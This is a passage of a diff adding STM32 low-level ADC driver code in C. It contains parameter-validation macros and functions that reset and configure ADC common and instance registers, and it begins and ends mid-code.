LL_ADC_CLOCK_SYNC_PCLK_DIV2) \ + || ((__CLOCK__) == LL_ADC_CLOCK_SYNC_PCLK_DIV4) \ + || ((__CLOCK__) == LL_ADC_CLOCK_SYNC_PCLK_DIV6) \ + || ((__CLOCK__) == LL_ADC_CLOCK_SYNC_PCLK_DIV8) \ + ) + +/* Check of parameters for configuration of ADC hierarchical scope: */ +/* ADC instance. */ +#define IS_LL_ADC_RESOLUTION(__RESOLUTION__) \ + ( ((__RESOLUTION__) == LL_ADC_RESOLUTION_12B) \ + || ((__RESOLUTION__) == LL_ADC_RESOLUTION_10B) \ + || ((__RESOLUTION__) == LL_ADC_RESOLUTION_8B) \ + || ((__RESOLUTION__) == LL_ADC_RESOLUTION_6B) \ + ) + +#define IS_LL_ADC_DATA_ALIGN(__DATA_ALIGN__) \ + ( ((__DATA_ALIGN__) == LL_ADC_DATA_ALIGN_RIGHT) \ + || ((__DATA_ALIGN__) == LL_ADC_DATA_ALIGN_LEFT) \ + ) + +#define IS_LL_ADC_SCAN_SELECTION(__SCAN_SELECTION__) \ + ( ((__SCAN_SELECTION__) == LL_ADC_SEQ_SCAN_DISABLE) \ + || ((__SCAN_SELECTION__) == LL_ADC_SEQ_SCAN_ENABLE) \ + ) + +#define IS_LL_ADC_SEQ_SCAN_MODE(__SEQ_SCAN_MODE__) \ + ( ((__SCAN_MODE__) == LL_ADC_SEQ_SCAN_DISABLE) \ + || ((__SCAN_MODE__) == LL_ADC_SEQ_SCAN_ENABLE) \ + ) + +/* Check of parameters for configuration of ADC hierarchical scope: */ +/* ADC group regular */ +#define IS_LL_ADC_REG_TRIG_SOURCE(__REG_TRIG_SOURCE__) \ + ( ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_SOFTWARE) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM1_CH1) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM1_CH2) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM1_CH3) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM2_CH2) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM2_CH3) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM2_CH4) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM2_TRGO) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM3_CH1) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM3_TRGO) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM4_CH4) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM5_CH1) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM5_CH2) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM5_CH3) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM8_CH1) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_TIM8_TRGO) \ + || ((__REG_TRIG_SOURCE__) == LL_ADC_REG_TRIG_EXT_EXTI_LINE11) \ + ) +#define IS_LL_ADC_REG_CONTINUOUS_MODE(__REG_CONTINUOUS_MODE__) \ + ( ((__REG_CONTINUOUS_MODE__) == LL_ADC_REG_CONV_SINGLE) \ + || ((__REG_CONTINUOUS_MODE__) == LL_ADC_REG_CONV_CONTINUOUS) \ + ) + +#define IS_LL_ADC_REG_DMA_TRANSFER(__REG_DMA_TRANSFER__) \ + ( ((__REG_DMA_TRANSFER__) == LL_ADC_REG_DMA_TRANSFER_NONE) \ + || ((__REG_DMA_TRANSFER__) == LL_ADC_REG_DMA_TRANSFER_LIMITED) \ + || ((__REG_DMA_TRANSFER__) == LL_ADC_REG_DMA_TRANSFER_UNLIMITED) \ + ) + +#define IS_LL_ADC_REG_FLAG_EOC_SELECTION(__REG_FLAG_EOC_SELECTION__) \ + ( ((__REG_FLAG_EOC_SELECTION__) == LL_ADC_REG_FLAG_EOC_SEQUENCE_CONV) \ + || ((__REG_FLAG_EOC_SELECTION__) == LL_ADC_REG_FLAG_EOC_UNITARY_CONV) \ + ) + +#define IS_LL_ADC_REG_SEQ_SCAN_LENGTH(__REG_SEQ_SCAN_LENGTH__) \ + ( ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_DISABLE) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_2RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_3RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_4RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_5RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_6RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_7RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_8RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_9RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_10RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_11RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_12RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_13RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_14RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_15RANKS) \ + || ((__REG_SEQ_SCAN_LENGTH__) == LL_ADC_REG_SEQ_SCAN_ENABLE_16RANKS) \ + ) + +#define IS_LL_ADC_REG_SEQ_SCAN_DISCONT_MODE(__REG_SEQ_DISCONT_MODE__) \ + ( ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_DISABLE) \ + || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_1RANK) \ + || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_2RANKS) \ + || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_3RANKS) \ + || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_4RANKS) \ + || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_5RANKS) \ + || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_6RANKS) \ + || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_7RANKS) \ + || ((__REG_SEQ_DISCONT_MODE__) == LL_ADC_REG_SEQ_DISCONT_8RANKS) \ + ) + +/* Check of parameters for configuration of ADC hierarchical scope: */ +/* ADC group injected */ +#define IS_LL_ADC_INJ_TRIG_SOURCE(__INJ_TRIG_SOURCE__) \ + ( ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_SOFTWARE) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM1_CH4) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM1_TRGO) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM2_CH1) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM2_TRGO) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM3_CH2) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM3_CH4) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM4_CH1) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM4_CH2) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM4_CH3) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM4_TRGO) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM5_CH4) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM5_TRGO) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM8_CH2) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM8_CH3) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_TIM8_CH4) \ + || ((__INJ_TRIG_SOURCE__) == LL_ADC_INJ_TRIG_EXT_EXTI_LINE15) \ + ) + +#define IS_LL_ADC_INJ_TRIG_EXT_EDGE(__INJ_TRIG_EXT_EDGE__) \ + ( ((__INJ_TRIG_EXT_EDGE__) == LL_ADC_INJ_TRIG_EXT_RISING) \ + || ((__INJ_TRIG_EXT_EDGE__) == LL_ADC_INJ_TRIG_EXT_FALLING) \ + || ((__INJ_TRIG_EXT_EDGE__) == LL_ADC_INJ_TRIG_EXT_RISINGFALLING) \ + ) + +#define IS_LL_ADC_INJ_TRIG_AUTO(__INJ_TRIG_AUTO__) \ + ( ((__INJ_TRIG_AUTO__) == LL_ADC_INJ_TRIG_INDEPENDENT) \ + || ((__INJ_TRIG_AUTO__) == LL_ADC_INJ_TRIG_FROM_GRP_REGULAR) \ + ) + +#define IS_LL_ADC_INJ_SEQ_SCAN_LENGTH(__INJ_SEQ_SCAN_LENGTH__) \ + ( ((__INJ_SEQ_SCAN_LENGTH__) == LL_ADC_INJ_SEQ_SCAN_DISABLE) \ + || ((__INJ_SEQ_SCAN_LENGTH__) == LL_ADC_INJ_SEQ_SCAN_ENABLE_2RANKS) \ + || ((__INJ_SEQ_SCAN_LENGTH__) == LL_ADC_INJ_SEQ_SCAN_ENABLE_3RANKS) \ + || ((__INJ_SEQ_SCAN_LENGTH__) == LL_ADC_INJ_SEQ_SCAN_ENABLE_4RANKS) \ + ) + +#define IS_LL_ADC_INJ_SEQ_SCAN_DISCONT_MODE(__INJ_SEQ_DISCONT_MODE__) \ + ( ((__INJ_SEQ_DISCONT_MODE__) == LL_ADC_INJ_SEQ_DISCONT_DISABLE) \ + || ((__INJ_SEQ_DISCONT_MODE__) == LL_ADC_INJ_SEQ_DISCONT_1RANK) \ + ) + +#if defined(ADC_MULTIMODE_SUPPORT) +/* Check of parameters for configuration of ADC hierarchical scope: */ +/* multimode. */ +#if defined(ADC3) +#define IS_LL_ADC_MULTI_MODE(__MULTI_MODE__) \ + ( ((__MULTI_MODE__) == LL_ADC_MULTI_INDEPENDENT) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_REG_SIMULT) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_REG_INTERL) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_INJ_SIMULT) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_INJ_ALTERN) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_REG_SIM_INJ_SIM) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_REG_SIM_INJ_ALT) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_REG_INT_INJ_SIM) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_TRIPLE_REG_SIM_INJ_SIM) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_TRIPLE_REG_SIM_INJ_ALT) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_TRIPLE_INJ_SIMULT) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_TRIPLE_REG_SIMULT) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_TRIPLE_REG_INTERL) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_TRIPLE_INJ_ALTERN) \ + ) +#else +#define IS_LL_ADC_MULTI_MODE(__MULTI_MODE__) \ + ( ((__MULTI_MODE__) == LL_ADC_MULTI_INDEPENDENT) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_REG_SIMULT) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_REG_INTERL) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_INJ_SIMULT) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_INJ_ALTERN) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_REG_SIM_INJ_SIM) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_REG_SIM_INJ_ALT) \ + || ((__MULTI_MODE__) == LL_ADC_MULTI_DUAL_REG_INT_INJ_SIM) \ + ) +#endif + +#define IS_LL_ADC_MULTI_DMA_TRANSFER(__MULTI_DMA_TRANSFER__) \ + ( ((__MULTI_DMA_TRANSFER__) == LL_ADC_MULTI_REG_DMA_EACH_ADC) \ + || ((__MULTI_DMA_TRANSFER__) == LL_ADC_MULTI_REG_DMA_LIMIT_1) \ + || ((__MULTI_DMA_TRANSFER__) == LL_ADC_MULTI_REG_DMA_LIMIT_2) \ + || ((__MULTI_DMA_TRANSFER__) == LL_ADC_MULTI_REG_DMA_LIMIT_3) \ + || ((__MULTI_DMA_TRANSFER__) == LL_ADC_MULTI_REG_DMA_UNLMT_1) \ + || ((__MULTI_DMA_TRANSFER__) == LL_ADC_MULTI_REG_DMA_UNLMT_2) \ + || ((__MULTI_DMA_TRANSFER__) == LL_ADC_MULTI_REG_DMA_UNLMT_3) \ + ) + +#define IS_LL_ADC_MULTI_TWOSMP_DELAY(__MULTI_TWOSMP_DELAY__) \ + ( ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_5CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_6CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_7CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_8CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_9CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_10CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_11CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_12CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_13CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_14CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_15CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_16CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_17CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_18CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_19CYCLES) \ + || ((__MULTI_TWOSMP_DELAY__) == LL_ADC_MULTI_TWOSMP_DELAY_20CYCLES) \ + ) + +#define IS_LL_ADC_MULTI_MASTER_SLAVE(__MULTI_MASTER_SLAVE__) \ + ( ((__MULTI_MASTER_SLAVE__) == LL_ADC_MULTI_MASTER) \ + || ((__MULTI_MASTER_SLAVE__) == LL_ADC_MULTI_SLAVE) \ + || ((__MULTI_MASTER_SLAVE__) == LL_ADC_MULTI_MASTER_SLAVE) \ + ) + +#endif /* ADC_MULTIMODE_SUPPORT */ +/** + * @} + */ + + +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup ADC_LL_Exported_Functions + * @{ + */ + +/** @addtogroup ADC_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize registers of all ADC instances belonging to + * the same ADC common instance to their default reset values. + * @param ADCxy_COMMON ADC common instance + * (can be set directly from CMSIS definition or by using helper macro @ref __LL_ADC_COMMON_INSTANCE() ) + * @retval An ErrorStatus enumeration value: + * - SUCCESS: ADC common registers are de-initialized + * - ERROR: not applicable + */ +ErrorStatus LL_ADC_CommonDeInit(ADC_Common_TypeDef *ADCxy_COMMON) +{ + /* Check the parameters */ + assert_param(IS_ADC_COMMON_INSTANCE(ADCxy_COMMON)); + + + /* Force reset of ADC clock (core clock) */ + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_ADC); + + /* Release reset of ADC clock (core clock) */ + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_ADC); + + return SUCCESS; +} + +/** + * @brief Initialize some features of ADC common parameters + * (all ADC instances belonging to the same ADC common instance) + * and multimode (for devices with several ADC instances available). + * @note The setting of ADC common parameters is conditioned to + * ADC instances state: + * All ADC instances belonging to the same ADC common instance + * must be disabled. + * @param ADCxy_COMMON ADC common instance + * (can be set directly from CMSIS definition or by using helper macro @ref __LL_ADC_COMMON_INSTANCE() ) + * @param ADC_CommonInitStruct Pointer to a @ref LL_ADC_CommonInitTypeDef structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: ADC common registers are initialized + * - ERROR: ADC common registers are not initialized + */ +ErrorStatus LL_ADC_CommonInit(ADC_Common_TypeDef *ADCxy_COMMON, LL_ADC_CommonInitTypeDef *ADC_CommonInitStruct) +{ + ErrorStatus status = SUCCESS; + + /* Check the parameters */ + assert_param(IS_ADC_COMMON_INSTANCE(ADCxy_COMMON)); + assert_param(IS_LL_ADC_COMMON_CLOCK(ADC_CommonInitStruct->CommonClock)); + +#if defined(ADC_MULTIMODE_SUPPORT) + assert_param(IS_LL_ADC_MULTI_MODE(ADC_CommonInitStruct->Multimode)); + if(ADC_CommonInitStruct->Multimode != LL_ADC_MULTI_INDEPENDENT) + { + assert_param(IS_LL_ADC_MULTI_DMA_TRANSFER(ADC_CommonInitStruct->MultiDMATransfer)); + assert_param(IS_LL_ADC_MULTI_TWOSMP_DELAY(ADC_CommonInitStruct->MultiTwoSamplingDelay)); + } +#endif /* ADC_MULTIMODE_SUPPORT */ + + /* Note: Hardware constraint (refer to description of functions */ + /* "LL_ADC_SetCommonXXX()" and "LL_ADC_SetMultiXXX()"): */ + /* On this STM32 series, setting of these features is conditioned to */ + /* ADC state: */ + /* All ADC instances of the ADC common group must be disabled. */ + if(__LL_ADC_IS_ENABLED_ALL_COMMON_INSTANCE(ADCxy_COMMON) == 0UL) + { + /* Configuration of ADC hierarchical scope: */ + /* - common to several ADC */ + /* (all ADC instances belonging to the same ADC common instance) */ + /* - Set ADC clock (conversion clock) */ + /* - multimode (if several ADC instances available on the */ + /* selected device) */ + /* - Set ADC multimode configuration */ + /* - Set ADC multimode DMA transfer */ + /* - Set ADC multimode: delay between 2 sampling phases */ +#if defined(ADC_MULTIMODE_SUPPORT) + if(ADC_CommonInitStruct->Multimode != LL_ADC_MULTI_INDEPENDENT) + { + MODIFY_REG(ADCxy_COMMON->CCR, + ADC_CCR_ADCPRE + | ADC_CCR_MULTI + | ADC_CCR_DMA + | ADC_CCR_DDS + | ADC_CCR_DELAY + , + ADC_CommonInitStruct->CommonClock + | ADC_CommonInitStruct->Multimode + | ADC_CommonInitStruct->MultiDMATransfer + | ADC_CommonInitStruct->MultiTwoSamplingDelay + ); + } + else + { + MODIFY_REG(ADCxy_COMMON->CCR, + ADC_CCR_ADCPRE + | ADC_CCR_MULTI + | ADC_CCR_DMA + | ADC_CCR_DDS + | ADC_CCR_DELAY + , + ADC_CommonInitStruct->CommonClock + | LL_ADC_MULTI_INDEPENDENT + ); + } +#else + LL_ADC_SetCommonClock(ADCxy_COMMON, ADC_CommonInitStruct->CommonClock); +#endif + } + else + { + /* Initialization error: One or several ADC instances belonging to */ + /* the same ADC common instance are not disabled. */ + status = ERROR; + } + + return status; +} + +/** + * @brief Set each @ref LL_ADC_CommonInitTypeDef field to default value. + * @param ADC_CommonInitStruct Pointer to a @ref LL_ADC_CommonInitTypeDef structure + * whose fields will be set to default values. + * @retval None + */ +void LL_ADC_CommonStructInit(LL_ADC_CommonInitTypeDef *ADC_CommonInitStruct) +{ + /* Set ADC_CommonInitStruct fields to default values */ + /* Set fields of ADC common */ + /* (all ADC instances belonging to the same ADC common instance) */ + ADC_CommonInitStruct->CommonClock = LL_ADC_CLOCK_SYNC_PCLK_DIV2; + +#if defined(ADC_MULTIMODE_SUPPORT) + /* Set fields of ADC multimode */ + ADC_CommonInitStruct->Multimode = LL_ADC_MULTI_INDEPENDENT; + ADC_CommonInitStruct->MultiDMATransfer = LL_ADC_MULTI_REG_DMA_EACH_ADC; + ADC_CommonInitStruct->MultiTwoSamplingDelay = LL_ADC_MULTI_TWOSMP_DELAY_5CYCLES; +#endif /* ADC_MULTIMODE_SUPPORT */ +} + +/** + * @brief De-initialize registers of the selected ADC instance + * to their default reset values. + * @note To reset all ADC instances quickly (perform a hard reset), + * use function @ref LL_ADC_CommonDeInit(). + * @param ADCx ADC instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: ADC registers are de-initialized + * - ERROR: ADC registers are not de-initialized + */ +ErrorStatus LL_ADC_DeInit(ADC_TypeDef *ADCx) +{ + ErrorStatus status = SUCCESS; + + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(ADCx)); + + /* Disable ADC instance if not already disabled. */ + if(LL_ADC_IsEnabled(ADCx) == 1UL) + { + /* Set ADC group regular trigger source to SW start to ensure to not */ + /* have an external trigger event occurring during the conversion stop */ + /* ADC disable process. */ + LL_ADC_REG_SetTriggerSource(ADCx, LL_ADC_REG_TRIG_SOFTWARE); + + /* Set ADC group injected trigger source to SW start to ensure to not */ + /* have an external trigger event occurring during the conversion stop */ + /* ADC disable process. */ + LL_ADC_INJ_SetTriggerSource(ADCx, LL_ADC_INJ_TRIG_SOFTWARE); + + /* Disable the ADC instance */ + LL_ADC_Disable(ADCx); + } + + /* Check whether ADC state is compliant with expected state */ + /* (hardware requirements of bits state to reset registers below) */ + if(READ_BIT(ADCx->CR2, ADC_CR2_ADON) == 0UL) + { + /* ========== Reset ADC registers ========== */ + /* Reset register SR */ + CLEAR_BIT(ADCx->SR, + ( LL_ADC_FLAG_STRT + | LL_ADC_FLAG_JSTRT + | LL_ADC_FLAG_EOCS + | LL_ADC_FLAG_OVR + | LL_ADC_FLAG_JEOS + | LL_ADC_FLAG_AWD1 ) + ); + + /* Reset register CR1 */ + CLEAR_BIT(ADCx->CR1, + ( ADC_CR1_OVRIE | ADC_CR1_RES | ADC_CR1_AWDEN + | ADC_CR1_JAWDEN + | ADC_CR1_DISCNUM | ADC_CR1_JDISCEN | ADC_CR1_DISCEN + | ADC_CR1_JAUTO | ADC_CR1_AWDSGL | ADC_CR1_SCAN + | ADC_CR1_JEOCIE | ADC_CR1_AWDIE | ADC_CR1_EOCIE + | ADC_CR1_AWDCH ) + ); + + /* Reset register CR2 */ + CLEAR_BIT(ADCx->CR2, + ( ADC_CR2_SWSTART | ADC_CR2_EXTEN | ADC_CR2_EXTSEL + | ADC_CR2_JSWSTART | ADC_CR2_JEXTEN | ADC_CR2_JEXTSEL + | ADC_CR2_ALIGN | ADC_CR2_EOCS + | ADC_CR2_DDS | ADC_CR2_DMA + | ADC_CR2_CONT | ADC_CR2_ADON ) + ); + + /* Reset register SMPR1 */ + CLEAR_BIT(ADCx->SMPR1, + ( ADC_SMPR1_SMP18 | ADC_SMPR1_SMP17 | ADC_SMPR1_SMP16 + | ADC_SMPR1_SMP15 | ADC_SMPR1_SMP14 | ADC_SMPR1_SMP13 + | ADC_SMPR1_SMP12 | ADC_SMPR1_SMP11 | ADC_SMPR1_SMP10) + ); + + /* Reset register SMPR2 */ + CLEAR_BIT(ADCx->SMPR2, + ( ADC_SMPR2_SMP9 + | ADC_SMPR2_SMP8 | ADC_SMPR2_SMP7 | ADC_SMPR2_SMP6 + | ADC_SMPR2_SMP5 | ADC_SMPR2_SMP4 | ADC_SMPR2_SMP3 + | ADC_SMPR2_SMP2 | ADC_SMPR2_SMP1 | ADC_SMPR2_SMP0) + ); + + /* Reset register JOFR1 */ + CLEAR_BIT(ADCx->JOFR1, ADC_JOFR1_JOFFSET1); + /* Reset register JOFR2 */ + CLEAR_BIT(ADCx->JOFR2, ADC_JOFR2_JOFFSET2); + /* Reset register JOFR3 */ + CLEAR_BIT(ADCx->JOFR3, ADC_JOFR3_JOFFSET3); + /* Reset register JOFR4 */ + CLEAR_BIT(ADCx->JOFR4, ADC_JOFR4_JOFFSET4); + + /* Reset register HTR */ + SET_BIT(ADCx->HTR, ADC_HTR_HT); + /* Reset register LTR */ + CLEAR_BIT(ADCx->LTR, ADC_LTR_LT); + + /* Reset register SQR1 */ + CLEAR_BIT(ADCx->SQR1, + ( ADC_SQR1_L + | ADC_SQR1_SQ16 + | ADC_SQR1_SQ15 | ADC_SQR1_SQ14 | ADC_SQR1_SQ13) + ); + + /* Reset register SQR2 */ + CLEAR_BIT(ADCx->SQR2, + ( ADC_SQR2_SQ12 | ADC_SQR2_SQ11 | ADC_SQR2_SQ10 + | ADC_SQR2_SQ9 | ADC_SQR2_SQ8 | ADC_SQR2_SQ7) + ); + + /* Reset register SQR3 */ + CLEAR_BIT(ADCx->SQR3, + ( ADC_SQR3_SQ6 | ADC_SQR3_SQ5 | ADC_SQR3_SQ4 + | ADC_SQR3_SQ3 | ADC_SQR3_SQ2 | ADC_SQR3_SQ1) + ); + + /* Reset register JSQR */ + CLEAR_BIT(ADCx->JSQR, + ( ADC_JSQR_JL + | ADC_JSQR_JSQ4 | ADC_JSQR_JSQ3 + | ADC_JSQR_JSQ2 | ADC_JSQR_JSQ1 ) + ); + + /* Reset register DR */ + /* bits in access mode read only, no direct reset applicable */ + + /* Reset registers JDR1, JDR2, JDR3, JDR4 */ + /* bits in access mode read only, no direct reset applicable */ + + /* Reset register CCR */ + CLEAR_BIT(ADC->CCR, ADC_CCR_TSVREFE | ADC_CCR_ADCPRE); + } + + return status; +} + +/** + * @brief Initialize some features of ADC instance. + * @note These parameters have an impact on ADC scope: ADC instance. + * Affects both group regular and group injected (availability + * of ADC group injected depends on STM32 families). + * Refer to corresponding unitary functions into + * @ref ADC_LL_EF_Configuration_ADC_Instance . + * @note The setting of these parameters by function @ref LL_ADC_Init() + * is conditioned to ADC state: + * ADC instance must be disabled. + * This condition is applied to all ADC features, for efficiency + * and compatibility over all STM32 families. However, the different + * features can be set under different ADC state conditions + * (setting possible with ADC enabled without conversion on going, + * ADC enabled with conversion on going, ...) + * Each feature can be updated afterwards with a unitary function + * and potentially with ADC in a different state than disabled, + * refer to description of each function for setting + * conditioned to ADC state. + * @note After using this function, some other features must be configured + * using LL unitary functions. + * The minimum configuration remaining to be done is: + * - Set ADC group regular or group injected sequencer: + * map channel on the selected sequencer rank. + * Refer to function @ref LL_ADC_REG_SetSequencerRanks(). + * - Set ADC channel sampling time + * Refer to function LL_ADC_SetChannelSamplingTime(); + * @param ADCx ADC instance + * @param ADC_InitStruct Pointer to a @ref LL_ADC_REG_InitTypeDef structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: ADC registers are initialized + * - ERROR: ADC registers are not initialized + */ +ErrorStatus LL_ADC_Init(ADC_TypeDef *ADCx, LL_ADC_InitTypeDef *ADC_InitStruct) +{ + ErrorStatus status = SUCCESS; + + /* Check the parameters */ + assert_param(IS_ADC_ALL_INSTANCE(ADCx)); + + assert_param(IS_LL_ADC_RESOLUTION(ADC_InitStruct->Resolution)); + assert_param(IS_LL_ADC_DATA_ALIGN(ADC_InitStruct->DataAlignment)); + assert_param(IS_LL_ADC_SCAN_SELECTION(ADC_InitStruct->SequencersScanMode)); + + /* Note: Hardware constraint (refer to description of this function): */ + /* ADC instance must be disabled. */ + if(LL_ADC_IsEnabled(ADCx) == 0UL) + { + /* Configuration of ADC hierarchical scope: */ + /* - ADC instance */ + /* - Set ADC data resolution */ + /* - Set ADC conversion data alignment */ + MODIFY_REG(ADCx->CR1, + ADC_CR1_RES + | ADC_CR1_SCAN + , + ADC_InitStruct->Resolution + | ADC_InitStruct->SequencersScanMode + ); + + MODIFY_REG(ADCx->CR2, + ADC_CR2_ALIGN + , + ADC_InitStruct->DataAlignment + ); + + } + else + { + /* Initialization error: ADC instance is not disabled. */ + status = ERROR; + } + return status; +} + +/** + * @brief Set each @ref LL_ADC_InitTypeDef field to default value. + * @param ADC_InitStruct Pointer to a @ref LL_ADC_InitTypeDef structure + * whose fields will be set to default values. + * @retval None + */ +void LL_ADC_StructInit(LL_ADC_InitTypeDef *ADC_InitStruct) +{ + /* Set ADC_InitStruct fields to default values */ + /* Set fields of ADC 